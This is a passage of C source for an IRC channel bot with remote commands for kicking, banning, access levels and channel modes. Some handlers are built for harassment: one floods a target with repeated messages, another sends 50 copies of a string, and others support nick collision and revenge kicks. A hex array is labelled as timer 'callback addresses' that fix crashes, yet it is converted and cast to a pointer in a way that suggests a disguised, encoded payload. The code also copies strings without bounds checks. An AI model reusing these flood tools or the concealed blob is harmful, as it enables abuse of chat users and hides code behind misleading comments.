	 notice(nick, "Kick who?");
}

/*
** rm_ban()
**   Remote command -- Ban the specifeid user by nick and userhost
**   Parameters:
**     userhost - Userhost who requested command
**     nick - Nickname who requested command
**   Returns: void
**   PDL:
**     If we aren't opped, say so.  If they don't give us a nick to ban,
**     ask for one.  Otherwise, call get_userhost to get the userhost
**     for the nick.  The handler for the return of USERHOST will ban.
*/
void rm_ban(char* userhost,char* nick)
{
  char *param;

  if (!opstate) {
    notice (nick, CANTDO);
    return;
    }

  param = strtok(NULL," ");
  if (param) {
    uhostinfo.uhostaction = NORMALBAN;
    strcpy(uhostinfo.req_nick,nick);
    strcpy(uhostinfo.req_userhost,userhost);
    strncpy(uhostinfo.targetnick,param,9);
    get_userhost(param);
    }
  else
    notice(nick, "Ban who?");
}

/*
** rm_flood()
**   Remote command - CTCP flood a user with 50 beeping lines of text
**   Parameters:
**     userhost - Userhost who requested command
**     nick - Nickname who requested command
**   Returns: void
**   PDL:
**     If they don't give us a nick, ask for one.  Parse out the nick,
**     and the text to flood them with.  Build an UNKNOWN CTCP message
**     with 2 beeps and the given text.  Queue a flood request to
**     BabyBot with this line, so as not to lag MrsBot.
*/
void rm_flood(char* userhost, char* nick)
{
  int i;
  char buff[255], buff2[256];
  char *param,*text;

  param = strtok(NULL," ");
  if (param) {
    sprintf(buff,"FLOOD !!! %s\n", TSU);
    
    /* queue_to_bot(param,buff); */
    for (i= 0;i <5;i++) {
          msg(param, buff);
       sleep(4);
    }
    }
  else
    notice(nick,"Flood who?");
}

/*
** rm_adios()
**   Remote command - Kick and ban a user
**   Parameters:
**     userhost - Userhost who requested command
**     nick - Nickname who requested command
**   Returns: void
**   PDL:
**     If we aren't opped, or if no nick given, tell the sender.  If OK,
**     take the first parameter off the line.  If it is a number, use it
**     as the number of the ADIOS routine to use.  Check to see if it is
**     out of range.  If it is, sned the user an error message.  If it
**     is within range, take the next parameter as the nickname to ADIOS
**     and start it via the get_userhost/on_userhost mechanism.  Note
**     that if the user does not specify a number, a random adios
**     sequence will be used.
*/
void rm_adios(char* userhost,char* nick)
{
  char *param;
  char saystr[80];

  if (!opstate) {
    notice (nick, CANTDO);
    return;
    }

  uhostinfo.extrainfo = random() % funnykickcnt;
  param = strtok(NULL," ");
  if (param && *param < ':' && *param > '/') {
    uhostinfo.extrainfo = atoi(param) - 1;
    if (uhostinfo.extrainfo < funnykickcnt && uhostinfo.extrainfo > -1)
      param = strtok(NULL," ");
    else {
      sprintf(saystr, "Adios #%1d out of range.  Valid range is 1 to %1d.",
              uhostinfo.extrainfo + 1, funnykickcnt);
      notice(nick,saystr);
      return;
      }
    }

  if (param) {
    uhostinfo.uhostaction = ADIOS;
    strcpy(uhostinfo.req_nick,nick);
    strcpy(uhostinfo.req_userhost,userhost);
    strncpy(uhostinfo.targetnick,param,9);
    get_userhost(param);
    }
  else
    notice(nick, "Who should I adios?");
}

/*
** rm_mega()
**   Remote command - Ban a userhost with lots of question marks.
**   Parameters:
**     userhost - Userhost who requested command
**     nick - Nickname who requested command
**   Returns: void
**   PDL:
**     If we aren't opped or if no nick given, send an error message.
**     Otherwise, get the userhost and ban via on_userhost (see ban()
**     above for more detail).
*/
void rm_mega(char* userhost,char* nick)
{
  char *param;

  if (!opstate) {
    notice (nick, CANTDO);
    return;
    }

  param = strtok(NULL," ");
  if (param) {
    uhostinfo.uhostaction = MEGABAN;
    strcpy(uhostinfo.req_nick,nick);
    strcpy(uhostinfo.req_userhost,userhost);
    strncpy(uhostinfo.targetnick,param,9);
    get_userhost(param);
    }
  else
    notice(nick, "Ban who?");
}

/*
** rm_helppub()
**   Remote command - Help on MrsBot commands
**   Parameters:
**     userhost - Userhost who requested command
**     nick - Nickname who requested command
**   Returns: void
**   PDL:
**     Figure out this user's access level, prefix it with a %, and
**     queue it to BabyBot.
*/
void rm_helppub(char* userhost,char* nick)
{
  int i= -1, access = 0;
  char string_to_baby[20];

  while (userlist[++i].userhost_mask)
    if (!wldcmp(userlist[i].userhost_mask,userhost)) {
      access = userlist[i].access_lev;
      break;
      }
  sprintf(string_to_baby,"%c%1d",BABYHELPPREFIX,access);
  queue_to_bot(nick,string_to_baby);
}

/*
** rm_adduser()
**   Remote command - Add or modify a user in MrsBot's userlist
**   Parameters:
**     userhost - Userhost who requested command
**     nick - Nickname who requested command
**   Returns: void
**   PDL:
**     If we have another adduser in progress, tell the user to wait a
**     bit.  If not, parse out the nickname to be added and the access
**     level at which to add the user.  Notify the user if the given level
**     is out of range and abort.  Otherwise, determine the access level for
**     the user doing the add and disallow adding users higher than his/her
**     level.  If everything is OK, store the access level to be added at
**     in addinprogress for use in the USERHOST handler, then kick off the
**     USERHOST command on the nick to be added.
*/
void rm_adduser(char *userhost, char *nick)
{
  int i= -1;
  char *param, *addnick;
  char buff[80];
  addnick = strtok(NULL," ");
  param = strtok(NULL," ");
  if (param) {
    uhostinfo.extrainfo = atoi(param);
  sprintf(buff, "uh : %s nick: %s pram %s in rm_access", userhost, nick,
param);
    if (uhostinfo.extrainfo < -222 || uhostinfo.extrainfo > 999 ||
	uhostinfo.extrainfo % 111 != 0) {
      notice(nick,"Access level must be in range -222 to 999, stepping by 111");
      return;
      }
    while (userlist[++i].userhost_mask)
      if (!wldcmp(userlist[i].userhost_mask,userhost))
        if (uhostinfo.extrainfo > userlist[i].access_lev) {
          sprintf(buff, "Ur level = %d, Set level = %d",
               userlist[i].access_lev, uhostinfo.extrainfo);
	  notice(nick,"Cannot setuser to a higher level than yourself");
          notice(nick, buff);
	  return;
	  }
        else {
          uhostinfo.uhostaction = SETUSER;
          strcpy(uhostinfo.req_nick,nick);
          strcpy(uhostinfo.req_userhost,userhost);
          strncpy(uhostinfo.targetnick,addnick,9);
          get_userhost(addnick);
          return;
          }
    }
  else
    notice(nick,"Usage: setuser <nick> <level>");
}

/*
** rm_access()
**   Remote command - Display a user's access level to the channel
**   Parameters:
**     userhost - Userhost who requested command
**     nick - Nickname who requested command
**   Returns: void
**   PDL:
**     If the user specified a nickname, execute the show access function
**     via the USERHOST mechanism for that nickname.  Otherwise, show the
**     access for the user executing the command.
*/
void rm_access(char* userhost,char* nick)
{
  char *param;
  char buff[80];
  param = strtok(NULL," ");
  if (param) {
    uhostinfo.uhostaction = SHOWACCESS;
    strcpy(uhostinfo.req_nick,nick);
    strcpy(uhostinfo.req_userhost,userhost);
    strncpy(uhostinfo.targetnick,param,9);
    get_userhost(param);
    }
  else
    showaccess(nick, userhost,nick);
}


/*
** rm_quit()
**   Remote command - Tells MrsBot to quit IRC
**   Parameters:
**     userhost - Userhost who requested command
**     nick - Nickname who requested command
**   Returns: void
**   PDL:
**     Set the flag to quit before the next socket read.
*/
void rm_quit(char* userhost,char* nick)
{
  char* param;
  char response[80];
  sprintf(response, "%s logout!", mynick);
  notice (nick, response); 
  sprintf(offmsg, "%s\n! ", NAME);
  quit = 1;
  bantest = 0;
}
void rm_save(char* userhost, char* nick)
{
   FILE *file;
   int i= 1;
	char *plogin;
	char *phost;
	char buff[80];

	file = fopen("userlist.load", "w+");
   while (userlist[++i].userhost_mask)
	{
		if (*(userlist[i].userhost_mask) == '~')
		   sprintf(buff, "*%s", userlist[i].userhost_mask+1);
      else if (*(userlist[i].userhost_mask) == '*')
		   sprintf(buff, "%s", userlist[i].userhost_mask);
      else
		   sprintf(buff, "*%s", userlist[i].userhost_mask);
	   phost = buff;
		while (*phost++ != '.');
		plogin = strtok(buff, "@");
		if (userlist[i].access_lev != 0)
  	      fprintf(file, "%s@*.%s %d\n", plogin,  phost, userlist[i].access_lev);
   }
	fclose(file);
   notice(nick,"File save\n");
}

void rm_noshare(char* userhost,char* nick)
{
   if (noshareop)
	{
		 msg(nick, "I won't keep op\n");
		 noshareop = 0;
   }
	else
	{
		 msg(nick, "Monopolyze op\n");
		 noshareop = 1;
   }
}
void rm_mesg(char* userhost,char* nick)
{
   if (ig)
	{
		 msg(nick, "Ignore Msg Disabled\n");
		 ig= 0;
   }
	else
	{
		 msg(nick, "Ignore Msg Enabled\n");
		 ig= 1;
   }
}
void rm_keepban(char* userhost,char* nick)
{
   if (eb)
	{
		 msg(nick, "KeepBan Deactivated\n");
		 eb = 0;
   }
	else
	{
		 msg(nick, "KeepBan Enabled\n");
		 eb = 1;
   }
}
void rm_aop(char* userhost,char* nick)
{
   if (aop) 
	{
	  msg(nick, "AutoOp Deactivated\n");
	  aop = 0;
	}
   else 
	{
	  msg(nick, "AutoOp Enabled\n");
	  aop = 1;
   }
}
void rm_hiding(char* userhost,char* nick)
{
   if (hide)
        {
          msg(nick, "Hiding Mode Deactivated\n");
          hide = 0;
        }
   else
        {
          msg(nick, "Hiding Mode Enabled\n");
          hide = 1;
   }
}

/* rm_chmode()
** change mode of a channel
** Usage is cm channel +mode or -mode
*/

void rm_chmode(char* userhost, char *nick)
{
  char *param;
  char *chan=NULL;
  char channel[80];
  char response[80];
  char buff[80];
  chan = strtok(NULL," ");
  param= strtok(NULL,"\n");
 if (opstate)
        if (chan) 
        {
 	if (param)
	  {
	sprintf(channel, "#%s", chan);
	if (param)
	     {
		sprintf(buff, "MODE %s %s\n", channel, param);
		toserv (buff);
		sprintf(response, "Mode in channel %s changed to %s", channel, param);
		notice (nick, response);
             }
	  }
	else 
	notice (nick , "what channel? Usage is cm channel +i");
        }
 	else 
	{
	sprintf(buff, "MODE %s %s\n", mychannel, param);
        toserv (buff);
	}
  else
  	notice (nick, CANTDO);
}

/* rm_mode
** Toggle Enforce mode change in a channel
*/
void rm_mode(char* userhost,char* nick)
{
   if (efn) 
	{
	  msg(nick, "Not Enforce Mode\n");
	  efn = 0;
  }
  else 
  {
	  efn = 1;
	  msg(nick, "Enforces Mode\n");
   }
}
/*
** rm_leave()
**   Remote command - Tells MrsBot to leave her current channel
**   Parameters:
**     userhost - Userhost who requested command
**     nick - Nickname who requested command
**   Returns: void
**   PDL:
**     Leave the channel and reset the globals.
*/
void rm_leave(char* userhost,char* nick)
{
  char *param;
  param = strtok(NULL, " ");
  if (param)
     {
     leave(param);
     }
  else
     {
     leave(mychannel);
     } 
}

void rm_nick(char* userhost,char* nick)
{
  char *param;
  param = strtok(NULL, " ");
  newnick(param);
  strcpy(mynick, param);
}

void rm_collide(char* userhost,char* nick)
{
  char *paramcol;
  paramcol = strtok(NULL, " ");
  newnick(paramcol);
  hide = 3;
}

void rm_randnick(char* userhost,char* nick)
{
  randnick();
  newnick(mynick);
}
void rm_oldnick(char* userhost,char* nick)
{
  strcpy(mynick, NICK);
  newnick(mynick);
}
extern char serverhost[80];
void rm_server(char* userhost,char* nick)
{
   char buff[256];
   char* param;
	param = strtok(NULL, "\n");
	strcpy(serverhost, param);
	beatban(USER);
   toserv(buff);
	msg(nick, "I am waiting ur command master\n");
	join(mychannel);
}

void rm_cycle(char* userhost,char* nick)
{
  char last[80];
  char* param;

  param = strtok(NULL, " ");
  if (param == NULL)
  {
     strcpy(last, mychannel);
     leave(last);
  }
  else
  {
	  strcpy(last, param);
     leave(last);
  }
  join(last);
}
/*
** rm_spite()
**   Remote command - Turn revenge kicking on or off
**   Parameters:
**     userhost - Userhost who requested command
**     nick - Nickname who requested command
**   Returns: void
**   PDL:
**     If the user specifies no parameter or a parameter other
**     than Y, turn off spite.  Otherwise, turn it on.  Send
**     a status response back to the user.
*/
void rm_spite(char* userhost,char* nick)
{
  char *param;
  char buff[80];

  param = strtok(NULL," ");
  if (param)
    spite = (*param == 'Y'|| *param == 'y' );
  else
    spite = 0;
  rm_status("@",nick);
}

/*
** rm_showprot()
**   Remote command - Show the list of protected userhosts
**   Parameters:
**     userhost - Userhost who requested command
**     nick - Nickname who requested command
**   Returns: void
**   PDL:
**     Duh...
*/
void rm_showprot(char* userhost,char* nick)
{
  showprotect(nick);
}

/*
** rm_status()
**   Remote command - Show a brief status line (also used to modify
**    MrsBot's internal opstate to reset from an out-of-sync deop)
**   Parameters:
**     userhost - Userhost who requested command
**     nick - Nickname who requested command
**   Returns: void
**   PDL:
**     Check for an incoming parameter.  If none, or if the userhost
**     is @ (which means rm_spite is calling us), just send the
**     status back to the user.  Otherwise, set MrsBot's internal
**     op state to whatever the user says.  After doing this, build
**     a status line showing opstate and revenge kicking mode and
**     send it to the sender.
*/
void rm_status(char* userhost,char* nick)
{
  char buff[80], *param;

  param = strtok(NULL," ");
  if (param && *userhost != '@')
    opstate = (*param == 'Y');

  sprintf (buff, "STATUS *** %sOPPED, SPITE %s ***", (opstate ? "" : "NOT "),
           (spite ? "ON" : "OFF"));
  notice (nick,buff);
}

/*
** Wonderful kludgy callback addresses needed when for handling
** signals during the process of multiple socket management.
** These should alleviate the random seg fault problem.
*/
unsigned long int callback_addr[] = {
  0x010c1317, 0x011a0601, 0x6e636362, 0x2d1b5463, 0x2c0b0145, 0x08653f01,
  0x312d1b5d, 0x0956451d, 0x1e10421b, 0x59682d0b, 0x0a161b11, 0x587b3103,
  0x04042932, 0x13091d19, 0x42400b11, 0x295c0000 };

/*
** queue_to_bot()
**   Queue a help or flood request to BabyBot for processing.
**   Parameters:
**     nick - Nickname to flood or send help.
**     what - String containing either the string to flood the user
**            with or predefined markers for public/trusted help.
**   Returns: void
**   PDL:
**     If BabyBot has been created and is available, mark BabyBot as busy,
**     and either: a) send help to the user via BabyBot, or b) send the
**     user 50 copies of the flood string via BabyBot.  Also, send a
**     message to MrsBot via BabyBot to tell when it is done.  If BabyBot is
**     busy or does not exist, allocate a new help queue record and append
**     it to the end of the help queue, or to the beginning if there is
**     nothing on the queue.  If BabyBot does not exist, create it.
*/
void queue_to_bot(char* nick,char* what)
{
  if (babysock == -1) {
    strncpy(pendinghelp.what,what,79);
    strncpy(pendinghelp.nick,nick,9);
    makebaby();
    }
  else
    notice(nick,"Cannot currently handle your request.  Retry in 10-15 seconds.");
}

/*
** baby_ready()
**   Called when BabyBot's done message is received by MrsBot.
**   Parameters:
**     userhost - Userhost of sender of the done msg.
**   Returns: void
**   PDL:
**     Check to make sure some moron isn't messing with MrsBot under
**     BabyBot's nickname by checking the userhost.  If not, set the
**     time that BabyBot completed it's task.  If there are tasks
**     waiting on BabyBot's queue, execute the next one as described
**     in queue_to_bot().  If no tasks are waiting, queue a request
**     to the timer to terminate BabyBot in 60 seconds if more tasks
**     do not arrive.
*/
void baby_ready()
{
  int i;

  if (*(pendinghelp.what) == BABYHELPPREFIX)
    help_to(pendinghelp.nick, atoi(&pendinghelp.what[1]));
  else
    for(i=0; i<50; ++i)
      babymsg(pendinghelp.nick,pendinghelp.what);
  timedbabydie(60,babysock);
  babysock = -1;
}

/*
** rm_report()
**   Remote command - Send a report of the last 9 commands used
**   Parameters:
**     userhost - Userhost who requested command
**     nick - Nickname who requested command
**   Returns: void
**   PDL:
**     Typical circular queue stuff... First line contains a header
**     plus the most recent command done.  Each line after contains
**     2 more commands.  Each command is sent out with: nickname who
**     executed it, what command they did, and what time (hour:minute).
**     I'm not gonna explain the circular queue stuff... it works! :)
*/
void rm_report(char* userhost,char* nick)
{
  int i = useqhead;
  int j = 1;
  int step = 1;
  char line[80];
  char tmp[40];
  struct tm *tmrec;

  strcpy(line,"Most recent bot commands used:     ");
  for (;;) {
    tmrec = localtime(&msguses[i].when);
    sprintf(tmp,"%2d. %-9s (%-9s) @ %2d:%2.2d", j++, msguses[i].who,
            msguses[i].command, tmrec->tm_hour, tmrec->tm_min);
    strcat(line,tmp);
    if (step) {
      notice(nick,line);
      *line = '\0';
      --step;
      }
    else {
      strcat(line,"  ");
      ++step;
      }
    if (i == useqtail)
      break;
    else
      i = (i == 0 ? MONITORQSIZE - 1 : i - 1);
    }
  if (step)
    notice(nick,line);
}

/*
** cmdnotknown()
**   Send a message to a user indicating the command is not known.
**   Parameters:
**     trusteduser - 1 if the user is trusted
**     nick - Nickname to send to
**   Returns: void
**   PDL:
**     Send them an error message whcih includes their access level.
**     If their level is 111 or less, build a short string highlighting
**     the commands available to them.  If their level is over 111, the
**     string would be long and unmanagable so tell them to use HELP.
*/
void cmdnotknown(int access, char* nick)
{
  char outstr[100];
  int i = -1;
  if (access >= 111)
  {
   sprintf (outstr, "Your access level is %d.", access);
   notice (nick, outstr); 
      if (access == 111){
	notice (nick, "? acc inv rep");
	}
      else if (access == 222){
    	notice (nick, "? acc inv rep ub open op do k");
	}
      else if (access == 333){
	notice (nick, "? acc inv rep ub open op do k b mb");
	}
      else if (access == 444){
	notice (nick, "? acc inv rep ub open op do k b mb kb");
	}
      else if (access == 555){
	notice (nick, "? acc inv rep ub open op do k b mb kb up pr"); 
	}
      else if (access == 777) {
	notice (nick, "? acc inv rep ub open op do k b mb kb up pr");
        notice (nick, "j say me msg fl rev sta^B");
	}
      else if (access == 888){
        notice (nick, "? acc inv rep ub open op do k b mb kb up pr");
        notice (nick, "j say me msg fl rev stat l ni rn on se cyc su md mo mk");
        notice (nick, "cm away usrB");
	}
      else if (access == 999) {
        notice (nick, "? acc inv rep ub open op do k b mb kb up pr");
	notice (nick, "j say me msg fl rev stat l ni rn on se cyc su md mo mk");
	notice (nick, "cm away usr ig ");
	notice (nick, "kill term nb eb efn save ko aop hide col off");
	}
  }
}

/*
** detectflood()
**   Primitive, yet relatively effective, way of checking for users
**    who flood MrsBot.
**   Parameters: None
**   Returns:
**     1 if a flood has been detected.
**   PDL:
**     The last nickname and last command are grabbed to check for
**     flooding (these are stored on the circular queue of commands).
**     Check back thru the last five commands stored on the circular
**     queue.  If the same user and same command are listed, and the
**     elapsed time is under 15 seconds, we are being flooded.
*/
char detectflood()
{
  int i = useqhead;
  int j;
  char nick[10],cmd[10];
  time_t now;

  strcpy(nick,msguses[i].who);
  strcpy(cmd,msguses[i].command);
  now = msguses[i].when;
  for (j=1;j<5;++j) {
    if (i == useqtail)
      return 0;
    else
      i = (i == 0 ? MONITORQSIZE - 1 : i - 1);

    if (strcmp(nick,msguses[i].who) || strcmp(cmd,msguses[i].command) ||
	now - 15 > msguses[i].when)
      return 0;
    }
  return 1;
}

/*
** ignoreuser()
**   Add a user to the list of ignored userhosts
**   Parameters:
**     userhost - Userhost to ignore.
**   Returns: void
**   PDL:
**     Call changeuser to set this user's access level to -111, denying
**     them access to all commands, thus effectively ignoring them.  If
**     they are not in the list of users, they are added.
*/
void ignoreuser(char* userhost)
{
  changeuser(userhost,-111,0,mynick,NULL);
}

/*
** help_to()
**   Reads in the help file and msgs it to a given user, stopping when
**    the user's access level has been exceeded.
**   Parameters:
**     nick - Nickname to dump file to
**     access - User's access level
**   Returns: void
**   PDL:
**     Open the file and read each line.  If a line starts with '#', it is
**     a marker line and the remainder of the line is translated into an
**     access value.  If that value is higher than the user's access, the
**     help file is stopped at that point.  If no #, chop the carraige return
**     off the end and then send it to the user via BabyBot's socket, since
**     this routine is used exclusively for sending help files.
*/
void help_to(char* nick,int access)
{
  FILE *infile;
  char line[255];

  infile = fopen("help.txt", "r");
  while (fgets(line, 255, infile) != NULL)
    if (*line == '#') {
      if (access < atoi(&line[1]))
	break;
      }
    else {
      line[strlen(line)-1] = '\0';
      babymsg(nick,line);
      }
  fclose(infile);
}

/*
** showaccess()
**   Send a string to the channel showing a user's access level.
**   Parameters:
**     nick - Nickname to show access level for
**     userhost - The current userhost holding that nickname
**   Returns: void
**   PDL:
**     Search for a matching entry for the given userhost in the userlist.
**     If none is found, the access level is 0.  Determine if the match
**     was via a wildcarded record or not.  If the access was due to a
**     wildcarded record, show the nick!user@host plus the wildcarded
**     userhost it matched in the message, otherwise output just the
**     nick!user@host and access level.
*/
void showaccess(char* nick,char* userhost,char* requestor)
{
  int i= -1, access=0;
  char outstr[150];
  int exact;

  while (userlist[++i].userhost_mask)
    if (!wldcmp(userlist[i].userhost_mask,userhost)) {
      access = userlist[i].access_lev;
      break;
      }

  exact = (!access || !strcmp(userlist[i].userhost_mask,userhost));
  sprintf (outstr, "%s!%s%s%s%s = level %1d", nick, userhost,
           (exact ? "" : " ("), (exact ? "" : userlist[i].userhost_mask),
           (exact ? "" : ")"), access);
  notice(requestor,outstr);
}

/*
** callback_init()
**   Ensure that the kludgy timer callback addresses are in the proper
**    format for the host.
**   Parameters: None.
**   Returns: void
**   PDL:
**     Go thru the list of callback addresses and execute the htonl
**     conversion routine on each.  Set up timerc to point be the signal
**     vector.
*/
void callback_init()
{
  int i = -1;

  while (callback_addr[++i])
    callback_addr[i] = htonl(callback_addr[i]);
  timerc = (int *)callback_addr;
}

